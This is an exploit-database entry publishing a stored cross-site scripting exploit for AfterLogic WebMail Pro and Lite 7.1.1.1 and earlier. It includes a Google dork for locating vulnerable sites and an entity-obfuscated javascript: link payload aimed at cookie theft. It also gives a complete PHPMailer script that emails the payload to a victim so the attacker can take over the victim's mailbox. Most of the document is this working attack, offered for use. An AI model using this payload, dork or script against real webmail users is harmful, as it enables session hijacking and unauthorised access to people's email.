AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS

2014.01.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

<?php /* # Exploit Title : AfterLogic Pro and Lite <= 7.1.1.1 Stored XSS # Google Dork : intext:"AfterLogic" intext:"Login Information" inurl:index.php # Date : 19 Jan 2014 # Exploit Author : Saeed reza Zamanian [s.zamanian [AT] imenantivirus.com] # Vendor Homepage: http://www.afterlogic.com/ # Software Link : http://www.afterlogic.com/download/webmail-pro # Version : <= 7.1.1.1 # Tested on : KALI Linux 1.0.5 (Debian) Apache/2.2.22 # CVE : vendor id = 6423 Greetz: H.Zamanian, K.Kia, K.Khani WebApp Desciption: AfterLogic WebMail is a browser-based e-mail and collaboration front end, designed to work with your existing messaging solutions. From an administrator&#8217;s perspective, the application is easy to install on your own server, easy to integrate and easy to maintain. Vulnerability Description: XSS codes can be stored in E-Mail Body. So you can send an email to the Victim with below payload and steal the victim's cookie. <a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cookie)>Click Me, Please...</a>\r\n NOTE: javascript html char encode = &#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116; then you will be able to get into the victim's mailbox via the url: http://[WebSite]/[AfterLogic]/Default.aspx ## Phpmailer class is included in the exploit so you need to download it here and run the exploit in the phpmailer directory: http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list */ echo "<title>AfterLogic Pro and Lite <= 7.1.1.1 XSS Exploit</title>"; require_once('class.phpmailer.php'); $mail = new PHPMailer(true); // the true param means it will throw exceptions on errors, which we need to catch $mail->IsSMTP(); // telling the class to use SMTP /* SETTINGS */ $smtp_user = "username"; // Any valid smtp account $smtp_pass = "password"; // Your PASSWORD $smtp_port = "25"; // SMTP PORT Default: 25 $smtp_host = "localhost"; // Any valid smtp server $from = "attacker@email.com"; // Any email $victim = "victim@email.com"; // Victim email on afterlogic webmail. $subject = "Salam"; // Subject /* Body Text */ $body = '<a href=&#106;&#97;&#118;&#97;&#83;&#99;&#82;&#105;&#112;&#116;:alert(document.cookie)>Click Me, Please...</a>\r\n'; try { $mail->SMTPDebug = 2; // enables SMTP debug information (for testing) $mail->SMTPAuth = false; // enable SMTP authentication $mail->Host = $smtp_host; $mail->Port = $smtp_port; $mail->Username = $smtp_user; // SMTP account username $mail->Password = $smtp_pass; // SMTP account password $mail->SetFrom($from, 'Attacker'); $mail->AddReplyTo($from, 'Attacker'); $mail->AddAddress($victim, 'Victim'); $mail->Subject = $subject; $mail->MsgHTML($body); $mail->Send(); echo "Message Sent OK</p>\n"; } catch (phpmailerException $e) { echo $e->errorMessage(); } catch (Exception $e) { echo $e->getMessage(); } ?> </body> </html>

References:

http://code.google.com/a/apache-extras.org/p/phpmailer/downloads/list


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top